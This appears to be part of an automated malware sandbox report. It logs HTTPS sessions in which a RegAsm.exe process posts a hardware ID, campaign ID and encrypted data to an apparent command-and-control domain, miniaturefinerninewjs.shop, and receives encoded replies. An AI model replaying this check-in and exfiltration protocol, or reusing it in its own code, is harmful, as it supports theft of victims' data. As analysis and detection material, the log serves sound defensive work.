2024-05-06 05:53:32 UTC	49	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 38 4e 67 43 6c 2d 2d 26 6a 3d 64 65 66 61 75 6c 74 Data Ascii: act=recive_message&ver=4.0&lid=H8NgCl--&j=default
2024-05-06 05:53:33 UTC	814	IN	HTTP/1.1 200 OK Date: Mon, 06 May 2024 05:53:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=j6i4oga1a1onhafbrcr5drrt91; expires=Thu, 29-Aug-2024 23:40:12 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=r21Eijf1vneoyc%2BQw3ceoe6qalJjD5WDcfitpNW378PV52u5uE4ILkDF8HeeOlQvAHGLABtjOGE8gd00IshVOK3yEr1lOMrZBxNGw2BvZl3jeLjVE5d2JJrpo%2Br9bLsTQmcG3AdQzSGRcQcEiQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87f6b5e50a0c222d-MIA alt-svc: h3=":443"; ma=86400
2024-05-06 05:53:33 UTC	555	IN	Data Raw: 35 30 35 0d 0a 52 5a 4b 76 4b 6b 50 62 66 53 66 62 69 5a 2f 7a 71 4b 5a 73 76 49 32 76 5a 46 63 35 51 4c 78 52 57 79 2b 31 66 7a 4f 67 42 74 49 2b 6d 4b 59 49 4e 66 6c 48 42 2b 2b 6c 6c 66 71 4b 31 51 6d 65 74 34 38 51 4a 55 77 6c 6b 46 74 53 44 64 51 62 45 5a 6f 6d 74 43 54 2b 33 45 39 76 30 58 51 46 74 76 47 39 79 59 6a 39 5a 72 58 32 70 57 31 65 47 79 58 53 63 32 45 50 6c 77 68 57 77 6d 4f 71 4d 66 66 42 57 53 71 30 45 32 65 32 37 4f 75 53 78 63 63 66 31 36 50 47 43 33 55 56 53 72 56 59 65 55 72 50 58 51 6d 41 4a 4a 38 67 35 73 35 6e 49 71 67 57 42 66 65 44 6c 76 71 4b 77 78 69 65 74 34 39 47 43 78 73 77 33 53 4d 36 51 73 59 6a 45 5a 70 39 6a 6d 66 37 32 30 38 78 75 67 6c 4f 74 4f 66 73 72 34 71 63 57 6f 79 39 6e 31 52 6e 52 47 4b 32 57 43 59 6c 76 43 Data Ascii: 505RZKvKkPbfSfbiZ/zqKZsvI2vZFc5QLxRWy+1fzOgBtI+mKYINflHB++llfqK1Qmet48QJUwlkFtSDdQbEZomtCT+3E9v0XQFtvG9yYj9ZrX2pW1eGyXSc2EPlwhWwmOqMffBWSq0E2e27OuSxccf16PGC3UVSrVYeUrPXQmAJJ8g5s5nIqgWBfeDlvqKwxiet49GCxsw3SM6QsYjEZp9jmf7208xuglOtOfsr4qcWoy9n1RnRGK2WCYlvC
2024-05-06 05:53:33 UTC	737	IN	Data Raw: 71 70 4a 4c 63 72 73 4a 55 4b 59 62 38 52 52 4c 54 72 37 35 6e 42 7a 77 76 4d 35 4d 51 4c 4f 46 73 76 31 44 77 36 54 64 41 58 57 38 31 75 74 43 72 39 79 30 67 68 2b 56 45 74 30 6f 43 39 6c 74 4b 45 56 70 79 76 37 67 4d 6c 58 43 37 49 63 51 4d 4e 76 33 5a 4f 6a 41 2f 79 5a 5a 69 6d 55 55 6e 53 64 41 57 2b 35 37 33 4a 69 49 51 47 32 2b 7a 4f 44 54 70 59 4b 74 55 68 4f 56 2f 52 45 46 54 51 59 72 55 70 2b 73 35 61 4b 37 63 5a 52 72 44 67 39 4a 54 4e 77 45 36 51 68 36 5a 74 64 56 77 36 6e 6d 74 37 44 66 59 51 57 73 35 75 70 79 65 77 70 53 4d 2b 39 33 63 75 6f 49 4f 57 2b 6f 72 44 41 70 36 33 6a 30 59 78 57 69 62 66 4e 7a 64 44 30 78 46 58 7a 47 6d 2f 49 66 72 4e 54 79 75 78 46 30 53 30 34 50 4b 52 7a 38 6b 4b 32 4f 50 4d 41 33 55 56 53 72 56 59 65 55 72 50 58 Data Ascii: qpJLcrsJUKYb8RRLTr75nBzwvM5MQLOFsv1Dw6TdAXW81utCr9y0gh+VEt0oC9ltKEVpyv7gMlXC7IcQMNv3ZOjA/yZZimUUnSdAW+573JiIQG2+zODTpYKtUhOV/REFTQYrUp+s5aK7cZRrDg9JTNwE6Qh6ZtdVw6nmt7DfYQWs5upyewpSM+93cuoIOW+orDAp63j0YxWibfNzdD0xFXzGm/IfrNTyuxF0S04PKRz8kK2OPMA3UVSrVYeUrPX
2024-05-06 05:53:33 UTC	1369	IN	Data Raw: 33 38 61 66 0d 0a 45 6e 53 41 41 76 52 67 4f 54 35 6f 61 39 4f 32 65 4f 4e 58 6e 63 62 4a 4e 49 32 4e 6b 50 58 45 31 44 50 59 72 51 71 38 4e 39 4f 4d 37 34 65 52 72 72 74 2b 4a 58 4b 78 51 76 62 36 38 55 43 4f 56 52 69 6b 46 74 53 4a 70 63 61 53 59 49 38 38 6d 66 66 32 6b 59 33 73 67 74 43 71 66 72 48 30 2f 2f 48 41 4e 44 6f 32 30 5a 64 4d 44 32 51 57 31 4a 55 76 33 59 36 67 6d 4f 38 5a 36 69 50 43 43 69 72 44 55 47 2f 34 50 61 44 32 4d 34 4b 33 2b 37 4b 43 54 52 51 4a 39 49 35 4d 6b 6e 46 46 56 6a 42 64 72 51 6e 2b 38 64 4f 59 66 64 33 4c 74 4b 72 2b 6f 6d 4b 6e 45 79 65 79 38 41 57 4f 56 41 30 32 53 4d 4d 54 74 6b 54 56 74 51 6b 32 45 7a 76 67 79 42 4b 6f 48 63 75 30 71 76 36 6e 59 71 63 54 4a 37 67 77 67 6b 39 57 79 50 61 50 6a 31 4d 32 68 46 59 77 57 Data Ascii: 38afEnSAAvRgOT5oa9O2eONXncbJNI2NkPXE1DPYrQq8N9OM74eRrrt+JXKxQvb68UCOVRikFtSJpcaSYI88mff2kY3sgtCqfrH0//HANDo20ZdMD2QW1JUv3Y6gmO8Z6iPCCirDUG/4PaD2M4K3+7KCTRQJ9I5MknFFVjBdrQn+8dOYfd3LtKr+omKnEyey8AWOVA02SMMTtkTVtQk2EzvgyBKoHcu0qv6nYqcTJ7gwgk9WyPaPj1M2hFYwW
2024-05-06 05:53:33 UTC	1369	IN	Data Raw: 6a 77 67 52 74 42 4e 4f 74 61 6e 49 6b 73 54 4b 43 63 69 76 70 57 30 71 46 55 71 31 4b 6c 45 6d 76 46 31 57 7a 69 54 6f 5a 62 44 43 53 53 79 7a 46 45 75 31 36 76 32 56 79 63 34 4f 30 65 72 4c 44 6a 78 62 4d 4e 6b 38 4f 45 7a 63 46 6c 7a 4d 59 62 45 69 39 34 30 47 53 64 4a 30 42 62 37 7a 76 63 6d 49 68 43 50 33 31 59 31 75 58 6b 52 73 74 6c 67 67 4a 62 78 32 45 63 56 6f 38 48 2b 79 6a 55 77 72 75 52 4a 50 73 75 54 2b 6c 73 54 45 41 39 54 39 78 51 59 31 56 53 54 66 50 7a 78 4d 32 78 35 44 7a 6d 4b 39 49 66 6a 66 43 47 2f 52 64 43 37 35 37 4f 58 52 6b 6f 5a 4f 2f 75 54 42 42 54 6c 61 4a 5a 77 53 4d 30 37 63 45 52 50 33 5a 37 34 70 39 39 73 49 53 64 49 41 43 39 47 41 35 50 6d 68 72 30 37 5a 34 34 31 65 64 78 73 6d 32 6a 38 35 53 74 6b 5a 56 38 39 6a 75 79 72 Data Ascii: jwgRtBNOtanIksTKCcivpW0qFUq1KlEmvF1WziToZbDCSSyzFEu16v2Vyc4O0erLDjxbMNk8OEzcFlzMYbEi940GSdJ0Bb7zvcmIhCP31Y1uXkRstlggJbx2EcVo8H+yjUwruRJPsuT+lsTEA9T9xQY1VSTfPzxM2x5DzmK9IfjfCG/RdC757OXRkoZO/uTBBTlaJZwSM07cERP3Z74p99sISdIAC9GA5Pmhr07Z441edxsm2j85StkZV89juyr
2024-05-06 05:53:33 UTC	1369	IN	Data Raw: 4c 77 5a 52 4c 7a 75 2f 4a 58 47 7a 67 6a 64 37 4d 49 4a 4f 6c 4e 69 6b 46 74 53 4a 70 63 61 53 59 49 38 38 6d 66 56 32 6b 4d 76 76 31 38 74 30 76 53 7a 2b 61 48 64 5a 72 57 45 6a 51 45 35 47 33 71 63 63 7a 56 45 30 52 74 55 7a 6d 57 32 4c 2f 58 46 54 43 43 2f 47 55 61 32 37 2f 69 51 78 63 41 43 30 4f 58 4d 42 7a 6c 51 4c 64 55 32 65 51 4f 2f 64 6a 71 43 59 36 68 6e 71 49 38 49 45 4c 6f 4a 55 71 6e 6e 76 66 6d 68 32 30 43 32 68 4e 52 75 58 6a 42 69 32 54 39 35 46 5a 56 64 55 4e 42 75 75 69 6e 31 77 6b 30 69 74 68 68 49 76 2b 66 33 6d 4d 4c 43 41 64 66 39 7a 67 6f 37 58 43 7a 53 50 54 52 48 31 42 41 52 6a 41 7a 62 54 4c 44 4b 55 47 48 68 58 51 57 56 37 50 43 2f 77 63 67 4a 6e 6f 65 6d 47 58 73 7a 53 63 64 62 55 69 61 58 47 6c 32 43 50 50 4a 6e 2f 4d 64 45 Data Ascii: LwZRLzu/JXGzgjd7MIJOlNikFtSJpcaSYI88mfV2kMvv18t0vSz+aHdZrWEjQE5G3qcczVE0RtUzmW2L/XFTCC/GUa27/iQxcAC0OXMBzlQLdU2eQO/djqCY6hnqI8IELoJUqnnvfmh20C2hNRuXjBi2T95FZVdUNBuuin1wk0ithhIv+f3mMLCAdf9zgo7XCzSPTRH1BARjAzbTLDKUGHhXQWV7PC/wcgJnoemGXszScdbUiaXGl2CPPJn/MdE
2024-05-06 05:53:33 UTC	1369	IN	Data Raw: 43 34 34 2f 65 5a 78 63 73 63 33 2b 44 45 41 54 35 57 4c 64 41 32 4e 31 2f 51 46 6c 72 4b 62 62 34 68 73 49 4d 67 53 74 4a 66 51 71 47 72 70 64 4f 4b 38 67 33 51 35 4e 77 4a 4e 6c 64 69 74 6c 67 6d 41 37 39 32 53 4b 6f 50 32 32 66 33 77 51 68 35 2b 31 39 4a 74 2b 76 79 6e 63 62 50 42 74 2f 6a 77 77 45 77 55 69 72 57 49 54 68 4a 33 78 78 66 7a 57 57 30 49 76 58 4a 54 79 57 2f 45 41 58 33 67 35 62 36 69 73 4d 57 6e 72 65 50 52 68 70 63 4e 2f 38 4a 65 53 57 38 41 68 2b 71 44 36 6c 50 6d 36 59 49 4a 72 56 66 48 66 75 72 39 35 72 4f 78 77 72 62 34 4d 77 48 4d 30 6b 6c 31 79 45 33 51 4e 67 56 57 63 74 6c 74 43 4c 39 79 30 51 72 75 42 68 4c 74 2b 4f 39 33 36 4b 76 5a 5a 37 6f 31 55 5a 74 47 57 4c 2f 49 79 4a 66 77 52 42 77 7a 32 76 77 54 35 76 53 42 6b 6e 53 42 Data Ascii: C44/eZxcsc3+DEAT5WLdA2N1/QFlrKbb4hsIMgStJfQqGrpdOK8g3Q5NwJNlditlgmA792SKoP22f3wQh5+19Jt+vyncbPBt/jwwEwUirWIThJ3xxfzWW0IvXJTyW/EAX3g5b6isMWnrePRhpcN/8JeSW8Ah+qD6lPm6YIJrVfHfur95rOxwrb4MwHM0kl1yE3QNgVWctltCL9y0QruBhLt+O936KvZZ7o1UZtGWL/IyJfwRBwz2vwT5vSBknSB
2024-05-06 05:53:33 UTC	1369	IN	Data Raw: 76 6c 4d 50 4d 43 74 66 76 79 51 77 34 58 43 4c 62 50 6a 78 4a 32 52 6c 57 77 6d 69 2f 49 50 6a 43 54 43 47 32 58 77 76 52 67 4a 62 52 7a 64 78 4f 68 71 32 4e 4a 6a 35 4e 41 39 41 34 4b 77 32 2f 64 6b 36 4d 44 4e 73 2b 6d 4b 59 6a 59 62 34 54 42 65 47 70 76 5a 2f 44 78 51 62 51 34 38 55 43 4a 31 73 70 31 7a 77 34 51 74 63 65 55 4d 68 73 6f 69 48 77 78 6b 41 6d 73 52 74 4c 71 2b 72 79 30 59 53 73 5a 62 57 76 79 68 35 31 41 32 43 65 41 69 39 4b 30 42 49 54 36 32 4f 72 4a 76 72 4f 51 79 33 35 64 79 36 6d 70 5a 58 36 30 36 78 6c 74 61 2f 4b 43 6e 55 44 59 4a 34 2b 4e 55 44 54 44 31 33 43 5a 4c 6b 67 2b 74 39 48 4c 72 51 63 52 62 7a 35 2f 49 50 46 7a 77 76 64 36 38 49 4a 4f 56 4d 6f 6e 6e 31 52 4a 72 78 64 56 74 6f 6b 36 47 57 77 34 55 73 77 73 31 31 69 6f 2f Data Ascii: vlMPMCtfvyQw4XCLbPjxJ2RlWwmi/IPjCTCG2XwvRgJbRzdxOhq2NJj5NA9A4Kw2/dk6MDNs+mKYjYb4TBeGpvZ/DxQbQ48UCJ1sp1zw4QtceUMhsoiHwxkAmsRtLq+ry0YSsZbWvyh51A2CeAi9K0BIT62OrJvrOQy35dy6mpZX606xlta/KCnUDYJ4+NUDTD13CZLkg+t9HLrQcRbz5/IPFzwvd68IJOVMonn1RJrxdVtok6GWw4Usws11io/
2024-05-06 05:53:33 UTC	1369	IN	Data Raw: 77 78 61 65 74 34 39 47 46 6b 77 30 31 43 68 35 4a 62 77 43 48 36 6f 50 71 55 2b 62 70 67 67 6d 74 56 38 64 2b 36 76 77 6c 73 54 4d 43 4e 44 70 33 77 6f 36 58 53 4c 66 4f 54 52 42 33 42 70 66 79 57 4b 31 4b 76 44 4c 54 69 57 39 47 30 75 36 71 37 50 35 6f 61 39 4f 32 66 65 4e 58 6e 63 62 42 66 4d 43 65 32 37 41 43 31 76 46 61 4b 59 73 38 63 35 65 4c 4b 6c 66 4c 64 4c 30 73 2f 6d 68 33 57 61 31 68 49 30 42 4f 52 74 36 6e 48 4d 79 51 39 49 63 58 63 68 6a 76 6a 58 78 78 30 51 67 76 68 68 4f 71 2b 44 76 6d 73 4c 48 41 4e 62 6d 7a 51 67 31 57 69 2f 65 63 33 63 6c 76 48 59 52 78 58 7a 77 66 37 4b 4e 62 51 4b 75 43 55 2f 37 79 4f 71 48 77 4d 4d 43 79 4f 54 4d 42 53 4e 57 4d 70 35 62 55 6c 4b 5a 64 54 72 62 44 4e 74 4d 73 4d 70 45 59 65 46 64 42 62 4c 6b 38 35 7a Data Ascii: wxaet49GFkw01Ch5JbwCH6oPqU+bpggmtV8d+6vwlsTMCNDp3wo6XSLfOTRB3BpfyWK1KvDLTiW9G0u6q7P5oa9O2feNXncbBfMCe27AC1vFaKYs8c5eLKlfLdL0s/mh3Wa1hI0BORt6nHMyQ9IcXchjvjXxx0QgvhhOq+DvmsLHANbmzQg1Wi/ec3clvHYRxXzwf7KNbQKuCU/7yOqHwMMCyOTMBSNWMp5bUlKZdTrbDNtMsMpEYeFdBbLk85z
2024-05-06 05:53:33 UTC	1369	IN	Data Raw: 71 47 6c 62 56 34 62 4a 73 39 7a 59 51 2b 48 54 77 71 58 4e 2b 64 33 6f 71 55 6a 50 76 64 33 4c 71 43 44 6c 76 71 4b 30 6b 36 47 72 5a 39 49 58 54 42 4a 6e 69 46 35 46 5a 56 64 46 73 78 70 73 53 54 2b 7a 6c 6f 7a 76 78 78 54 75 71 7a 44 72 2b 76 4a 42 64 4c 69 77 67 30 4c 5a 51 50 54 4f 44 56 41 32 42 5a 76 2f 48 47 7a 4b 66 37 4b 58 6a 44 35 55 53 33 53 67 4c 32 65 69 70 78 4d 35 36 2b 46 52 67 6f 56 53 72 56 59 65 56 57 58 52 52 4f 43 55 62 4d 70 2f 73 70 65 4d 50 51 2b 53 4c 4c 6e 38 4a 37 42 68 45 43 32 68 4b 5a 47 4d 78 74 36 6e 47 4e 33 4a 62 78 32 45 63 5a 31 38 48 2b 79 6e 52 70 36 37 45 77 53 36 62 6d 56 2b 74 57 4b 5a 72 58 32 70 57 31 65 47 7a 53 65 61 33 73 66 6d 58 55 36 71 53 53 69 5a 36 69 50 43 47 61 36 44 56 65 2f 36 4f 75 53 6a 66 6f 77 Data Ascii: qGlbV4bJs9zYQ+HTwqXN+d3oqUjPvd3LqCDlvqK0k6GrZ9IXTBJniF5FZVdFsxpsST+zlozvxxTuqzDr+vJBdLiwg0LZQPTODVA2BZv/HGzKf7KXjD5US3SgL2eipxM56+FRgoVSrVYeVWXRROCUbMp/speMPQ+SLLn8J7BhEC2hKZGMxt6nGN3Jbx2EcZ18H+ynRp67EwS6bmV+tWKZrX2pW1eGzSea3sfmXU6qSSiZ6iPCGa6DVe/6OuSjfow

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49770	104.21.30.191	443	5856	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-06 05:53:33 UTC	292	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 18158 Host: miniaturefinerninewjs.shop
2024-05-06 05:53:33 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 46 31 35 43 39 38 39 30 31 45 45 46 34 30 30 35 44 32 36 34 45 31 33 31 46 46 36 31 44 33 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"DF15C98901EEF4005D264E131FF61D32--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
2024-05-06 05:53:33 UTC	2827	OUT	Data Raw: 4d e7 b8 03 4d ad dd 29 81 f2 25 6f 8d 9b f3 9f 07 bb ae 6e c1 f4 74 a0 46 9e dd 44 3a b6 ea f7 8d 77 8c 30 f7 2d 3a 5e 78 e6 d9 84 b0 07 c8 dc 44 8b 5c 37 7b fb ca 23 5f 36 6d 2b c9 df b7 24 a9 bc 70 d3 dd 98 da 4d 16 48 c1 d0 c9 d5 49 13 55 45 68 ed 5e ef aa d6 a5 b6 55 e8 30 13 67 aa 7a 0c 44 f5 2f c0 e3 2b e7 fb 3b 59 90 f0 70 93 c0 3f ee 4c 10 0e bb be eb 3c d7 34 e8 6e cd 74 c5 e2 cb eb 6d db e8 13 05 d7 da ba 6c 95 3d a2 38 f5 d7 4b e3 d4 69 a8 33 83 0e 15 fa 46 ca d1 d5 a4 6f 98 ff ba be f6 4f ec e7 b8 41 b9 35 35 6f df d7 6e b4 81 3d a9 b9 db c0 6c dc 0d bd e3 2e 85 05 bc 3b 82 4b 1b 1e ce 0b 47 dd 7b be cb 51 82 bb d3 d3 f4 36 9c 58 ee 7c 6d cc b2 92 e5 6e b1 c6 c7 5e d9 b7 ac 49 aa b3 55 f5 d2 ec 6d 9e f3 27 aa 33 f8 52 f0 fd e9 0a 3f 6c af 16 Data Ascii: MM)%ontFD:w0-:^xD\7{#_6m+$pMHIUEh^U0gzD/+;Yp?L<4ntml=8Ki3FoOA55on=l.;KG{Q6X\|mn^IUm'3R?l
2024-05-06 05:53:34 UTC	814	IN	HTTP/1.1 200 OK Date: Mon, 06 May 2024 05:53:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=rfsj62sm5dl6l3fpapg350lh1f; expires=Thu, 29-Aug-2024 23:40:12 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gd50E4tt2vPzZxcP82PYO9Rmzc6ktuBcBTfNtTX2to1avCDnWndRKRux%2BIOtKShtiWEtvZT9w7PMlrKz%2Fi4UeQuQFpkgWqCLZ1dAPtB0edcQbspMbRWVmVynpmCKLdi4mgKbhkaL8VM4sW3llQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87f6b5e84bdab3e5-MIA alt-svc: h3=":443"; ma=86400
2024-05-06 05:53:34 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 34 2e 31 37 2e 34 30 2e 31 30 31 0d 0a Data Ascii: fok 84.17.40.101
2024-05-06 05:53:34 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
17	192.168.2.4	49771	104.21.30.191	443

Timestamp	Bytes transferred	Direction	Data
2024-05-06 05:53:33 UTC	292	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 18158 Host: miniaturefinerninewjs.shop
2024-05-06 05:53:33 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 46 31 35 43 39 38 39 30 31 45 45 46 34 30 30 35 44 32 36 34 45 31 33 31 46 46 36 31 44 33 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"DF15C98901EEF4005D264E131FF61D32--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
2024-05-06 05:53:33 UTC	2827	OUT	Data Raw: 4d e7 b8 03 4d ad dd 29 81 f2 25 6f 8d 9b f3 9f 07 bb ae 6e c1 f4 74 a0 46 9e dd 44 3a b6 ea f7 8d 77 8c 30 f7 2d 3a 5e 78 e6 d9 84 b0 07 c8 dc 44 8b 5c 37 7b fb ca 23 5f 36 6d 2b c9 df b7 24 a9 bc 70 d3 dd 98 da 4d 16 48 c1 d0 c9 d5 49 13 55 45 68 ed 5e ef aa d6 a5 b6 55 e8 30 13 67 aa 7a 0c 44 f5 2f c0 e3 2b e7 fb 3b 59 90 f0 70 93 c0 3f ee 4c 10 0e bb be eb 3c d7 34 e8 6e cd 74 c5 e2 cb eb 6d db e8 13 05 d7 da ba 6c 95 3d a2 38 f5 d7 4b e3 d4 69 a8 33 83 0e 15 fa 46 ca d1 d5 a4 6f 98 ff ba be f6 4f ec e7 b8 41 b9 35 35 6f df d7 6e b4 81 3d a9 b9 db c0 6c dc 0d bd e3 2e 85 05 bc 3b 82 4b 1b 1e ce 0b 47 dd 7b be cb 51 82 bb d3 d3 f4 36 9c 58 ee 7c 6d cc b2 92 e5 6e b1 c6 c7 5e d9 b7 ac 49 aa b3 55 f5 d2 ec 6d 9e f3 27 aa 33 f8 52 f0 fd e9 0a 3f 6c af 16 Data Ascii: MM)%ontFD:w0-:^xD\7{#_6m+$pMHIUEh^U0gzD/+;Yp?L<4ntml=8Ki3FoOA55on=l.;KG{Q6X\|mn^IUm'3R?l
2024-05-06 05:53:34 UTC	822	IN	HTTP/1.1 200 OK Date: Mon, 06 May 2024 05:53:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=s01it3b0sj23slo8jjnt1egn8v; expires=Thu, 29-Aug-2024 23:40:12 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oDLyD9oqR3%2Bmv2NHr8vFkazm1z1TE9nJOTc%2BvklHNmYXaCuehO0vCkuGBDbUA9v%2FhUkm%2FGwS3ik7%2FXSe1VgxbiXrGZT9yisEiE%2FXHKw4BtV4ThFEUDtjBGjYy1gL85dehY12MIzL8fuIPU1j0A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87f6b5e8a9a974ac-MIA alt-svc: h3=":443"; ma=86400
2024-05-06 05:53:34 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 34 2e 31 37 2e 34 30 2e 31 30 31 0d 0a Data Ascii: fok 84.17.40.101
2024-05-06 05:53:34 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
18	192.168.2.4	49775	104.21.30.191	443

Timestamp	Bytes transferred	Direction	Data
2024-05-06 05:53:36 UTC	291	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8779 Host: miniaturefinerninewjs.shop
2024-05-06 05:53:36 UTC	8779	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 46 31 35 43 39 38 39 30 31 45 45 46 34 30 30 35 44 32 36 34 45 31 33 31 46 46 36 31 44 33 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"DF15C98901EEF4005D264E131FF61D32--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
2024-05-06 05:53:36 UTC	812	IN	HTTP/1.1 200 OK Date: Mon, 06 May 2024 05:53:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=mhpq43vhn296bsl3i1rkkjldbn; expires=Thu, 29-Aug-2024 23:40:15 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lmtN4AHqO3dpTVUshfKAyCXeeVLS0sXB2drnOYsyxgQ7V7R%2FG1Oziv4nfXQRYNMv6RlEFNDCU2Pzslz3sP11nwWzg4MeJJnxeiVWdrDVszlECwELk97hFc7Na9A1621PCX76lbpt3Oyf3YFVig%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87f6b5fb09563710-MIA alt-svc: h3=":443"; ma=86400
